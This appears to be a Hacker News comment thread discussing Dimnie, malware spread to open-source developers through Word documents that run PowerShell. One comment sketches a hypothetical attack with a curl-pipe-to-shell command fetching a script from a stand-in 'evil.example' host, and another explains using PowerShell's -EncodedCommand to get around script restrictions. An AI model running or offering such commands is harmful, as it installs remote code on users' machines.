Dimnie: Malware targeting open-source developers
arstechnica.co.uk
arstechnica.co.uk
If I was some evil-doer though I'd develop some marketing heavy Javascript/Rust/language-of-the-week framework, hit HN frontpage and have the call-to-action copy be:
> Install in picoseconds!
> curl -sf http://evil.example/evil_install.sh | sh
edit: corrected hypothetical attack
It's good to know that the traditional vulnerabilities of Microsoft Word documents have been updated to use the new PowerShell.
Also, you can pass complete powershell scripts over the command line which bypasses the script restriction (because you can just input your entire script over the command line).
This is done with the -E (-EncodedCommand) flag. Which takes a base64 encoded string with statements separated by semi-colons.
Good to know that Microsoft is focusing on the important things.[0]
What's worrying to me is the wording of the emails themselves. It's much better, and more likely appearing "legit" than the vast multitude of scam/trojan/similar .pdf/.xls/.doc/.lnk/etc emails I've seen. (several a day generally)
Out just develop a really useful node script that then gets a little extra.
What happens if you open the claimed Word doc in LibreOffice?
The pings are used as a delay, without pausing the entire process or thread.
Submitters: please submit original sources, as the site guidelines ask (https://news.ycombinator.com/newsguidelines.html). Myriads of blog posts and articles mostly just point to something else; be a good HN submitter and do the pointer traversal for the rest of us.
I submitted the Ars one instead of the original source, as the Ars one is much more approachable than the original source, and I didn't see the previous submission. Which is weird, as I searched first. Bad me. :/
That being said, the PAN post definitely has the better detail once a person grok's what it's about. :)